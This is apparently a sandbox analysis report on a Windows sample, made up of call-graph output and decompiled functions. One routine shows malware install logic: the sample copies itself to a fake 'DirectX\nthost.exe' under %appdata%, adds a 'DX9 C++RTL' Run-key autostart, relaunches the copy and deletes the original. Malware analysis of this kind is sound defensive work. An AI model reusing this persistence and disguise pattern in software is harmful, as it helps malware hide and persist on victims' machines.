17402->17405 17406 403d0d 17402->17406 17404->17334 17405->17406 17406->17334 17410 40a664 17407->17410 17409 406d59 17409->17341 17411 40a672 17410->17411 17412 405824 56 API calls 17411->17412 17413 40a69c 17412->17413 17420 407cec 17413->17420 17418 403eac 11 API calls 17419 40a6cf 17418->17419 17419->17409 17429 407d00 17420->17429 17423 403edc 17424 403ee0 17423->17424 17427 403ef0 17423->17427 17426 403f4c 25 API calls 17424->17426 17424->17427 17425 403f1e 17425->17418 17426->17427 17427->17425 17428 402690 11 API calls 17427->17428 17428->17425 17430 407d24 17429->17430 17431 407d4f 17430->17431 17442 407934 17430->17442 17433 407da7 17431->17433 17436 407d64 17431->17436 17434 403f78 25 API calls 17433->17434 17435 407cfb 17434->17435 17435->17423 17437 407d9d 17436->17437 17439 403e88 11 API calls 17436->17439 17440 404478 25 API calls 17436->17440 17441 407934 56 API calls 17436->17441 17438 404478 25 API calls 17437->17438 17438->17435 17439->17436 17440->17436 17441->17436 17447 40795d 17442->17447 17443 40796e 17461 407c8b 17443->17461 17446 407a16 11 API calls 17446->17447 17447->17443 17447->17446 17450 407a5e 17447->17450 17458 407928 17447->17458 17451 407a6f 17450->17451 17455 407ac9 17450->17455 17454 407b67 17451->17454 17451->17455 17452 407c8b 11 API calls 17452->17455 17457 406fb0 17454->17457 17468 407904 17454->17468 17455->17452 17455->17457 17464 4078ac 17455->17464 17457->17447 17459 403e88 11 API calls 17458->17459 17460 407932 17459->17460 17460->17447 17462 403e88 11 API calls 17461->17462 17463 407c98 17462->17463 17463->17431 17465 4078bd 17464->17465 17466 406d40 56 API calls 17465->17466 17467 4078fd 17466->17467 17467->17455 17469 40791c 17468->17469 17471 407910 17468->17471 17470 402778 11 API calls 17469->17470 17472 407923 17470->17472 17471->17457 17472->17457 17474 40434c ExpandEnvironmentStringsA 17473->17474 17474->17346 17476 40761f 17475->17476 17499 4043a8 17476->17499 17479 4074a0 17480 4074b5 17479->17480 17481 4074dd 17480->17481 17506 40a628 17480->17506 17510 40b13c 17481->17510 17486 407503 17497 407553 17486->17497 17519 40747c 17486->17519 17488 403eac 11 API calls 17489 407577 17488->17489 17489->17360 17492 407527 17493 4075d8 25 API calls 17492->17493 17492->17497 17494 40753f 17493->17494 17495 4074a0 58 API calls 17494->17495 17496 407547 17495->17496 17496->17497 17527 407748 17496->17527 17497->17488 17500 4043da 17499->17500 17502 4043ad 17499->17502 17501 403e88 11 API calls 17500->17501 17505 4043d0 17501->17505 17502->17500 17503 4043c1 17502->17503 17504 403f78 25 API calls 17503->17504 17504->17505 17505->17479 17507 40a62f 17506->17507 17508 405824 56 API calls 17507->17508 17509 40a647 17508->17509 17509->17481 17511 403edc 25 API calls 17510->17511 17512 40b14b 17511->17512 17513 4074f8 17512->17513 17514 404478 25 API calls 17512->17514 17515 403f20 17513->17515 17514->17513 17517 403f24 17515->17517 17516 403f48 17516->17486 17517->17516 17518 402690 11 API calls 17517->17518 17518->17516 17520 404348 17519->17520 17521 407486 GetFileAttributesA 17520->17521 17522 407491 17521->17522 17522->17497 17523 4075d8 17522->17523 17524 4075eb 17523->17524 17525 4043a8 25 API calls 17524->17525 17526 4075fc 17525->17526 17526->17492 17528 404348 17527->17528 17529 407754 CreateDirectoryA 17528->17529 17529->17497 17532 41782e 17530->17532 17555 417538 17532->17555 17533 417843 17533->17038 17535 417762 17534->17535 17536 41779b 17535->17536 17538 403edc 25 API calls 17535->17538 17537 403e88 11 API calls 17536->17537 17539 4177b0 17537->17539 17538->17536 17539->17043 17541 4177ce 17540->17541 17542 417807 17541->17542 17544 403edc 25 API calls 17541->17544 17543 403e88 11 API calls 17542->17543 17545 41781c 17543->17545 17544->17542 17545->17046 17547 403e88 11 API calls 17546->17547 17552 41734a 17547->17552 17549 4173fa 17550 403e88 11 API calls 17549->17550 17551 417412 17550->17551 17551->17051 17552->17549 17627 4172ac 726517A8 17552->17627 17629 4172d0 726517A8 17552->17629 17631 404150 17552->17631 17557 41753e 17555->17557 17567 417134 17557->17567 17558 417553 17559 403e88 11 API calls 17558->17559 17560 417565 17559->17560 17561 403e88 11 API calls 17560->17561 17562 41756d 17561->17562 17563 403e88 11 API calls 17562->17563 17564 417575 17563->17564 17565 403e88 11 API calls 17564->17565 17566 41757d 17565->17566 17566->17533 17568 41713a 17567->17568 17573 416120 17568->17573 17570 41714f 17577 40ba84 17570->17577 17572 4171a3 17572->17558 17574 416127 17573->17574 17576 41614a 17574->17576 17582 416284 17574->17582 17576->17570 17612 40ba10 17577->17612 17580 40ba9e 17580->17572 17583 416298 17582->17583 17585 4162ca 17583->17585 17586 416700 17583->17586 17585->17576 17588 416710 17586->17588 17587 416749 17587->17585 17588->17587 17590 416700 56 API calls 17588->17590 17591 4166c4 17588->17591 17590->17588 17592 4166e2 17591->17592 17593 4166d0 17591->17593 17604 4115c0 17592->17604 17597 41156c 17593->17597 17598 405824 56 API calls 17597->17598 17599 41158f 17598->17599 17608 411534 17599->17608 17605 4115ca 17604->17605 17606 41156c 56 API calls 17605->17606 17607 4115de 17605->17607 17606->17607 17607->17588 17609 411542 17608->17609 17610 40a5a8 56 API calls 17609->17610 17611 411561 17610->17611 17611->17611 17622 40b9a0 17612->17622 17614 40ba74 17614->17580 17619 40b988 17614->17619 17615 40ba1a 17615->17614 17616 40ba60 FreeResource 17615->17616 17616->17614 17617 40ba6f 17616->17617 17618 40b988 56 API calls 17617->17618 17618->17614 17620 40a628 56 API calls 17619->17620 17621 40b99a 17620->17621 17621->17580 17623 40b9ad FindResourceA LoadResource 17622->17623 17626 40b9d1 17622->17626 17624 40ba02 17623->17624 17624->17615 17625 40b9df FindResourceA LoadResource 17625->17624 17625->17626 17626->17624 17626->17625 17628 4172cb 17627->17628 17628->17552 17630 4172f5 17629->17630 17630->17552 17632 404193 17631->17632 17633 404154 17631->17633 17632->17552 17634 40415e 17633->17634 17637 403edc 17633->17637 17635 404188 17634->17635 17636 404171 17634->17636 17640 404478 25 API calls 17635->17640 17638 404478 25 API calls 17636->17638 17641 403f4c 25 API calls 17637->17641 17642 403ef0 17637->17642 17644 404176 17638->17644 17639 403f1e 17639->17552 17640->17644 17641->17642 17642->17639 17643 402690 11 API calls 17642->17643 17643->17639 17644->17552 17646 402670 25 API calls 17645->17646 17647 403e5a CreateThread 17646->17647 17647->17057 17648 403e0c 17647->17648 17649 403e14 17648->17649 17650 402690 11 API calls 17649->17650 17651 403e32 17650->17651 17653 4183ac 17652->17653 17658 418240 17653->17658 17656 403e88 11 API calls 17657 4183dc 17656->17657 17657->16954 17659 41827a 17658->17659 17676 406d84 17659->17676 17665 418358 CloseHandle 17666 41836b 17665->17666 17668 403eac 11 API calls 17666->17668 17667 4182b8 17667->17665 17672 406d84 25 API calls 17667->17672 17674 41833c 17667->17674 17686 407660 17667->17686 17690 417d2c 17667->17690 17670 41837b 17668->17670 17671 403eac 11 API calls 17670->17671 17673 418388 17671->17673 17672->17667 17673->17656 17674->17665 17677 406d92 17676->17677 17678 404478 25 API calls 17677->17678 17679 406d9d 17678->17679 17680 417cec 17679->17680 17693 417a70 17680->17693 17683 417d0c 17684 417a70 17 API calls 17683->17684 17685 417d17 17684->17685 17685->17667 17687 407673 17686->17687 17688 4043a8 25 API calls 17687->17688 17689 407685 17688->17689 17689->17667 17691 417a70 17 API calls 17690->17691 17692 417d37 17691->17692 17692->17667 17694 417a7f GetModuleHandleA 17693->17694 17695 417bb4 17693->17695 17694->17695 17696 417a94 16 API calls 17694->17696 17695->17683 17696->17695 17700 4183ec 17697->17700 17699 41856a 17699->17071 17699->17072 17701 417cec 17 API calls 17700->17701 17702 418405 17701->17702 17703 417d0c 17 API calls 17702->17703 17707 418417 17703->17707 17704 41843c CloseHandle 17704->17699 17705 418425 17705->17704 17706 417d2c 17 API calls 17706->17707 17707->17704 17707->17705 17707->17706 17708 417974 WSAStartup 17709 417987 17708->17709 17710 417998 17708->17710 17712 40a56c 17709->17712 17714 40a573 17712->17714 17713 403edc 25 API calls 17715 40a58b 17713->17715 17714->17713 17715->17710

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0); // executed
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1);
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
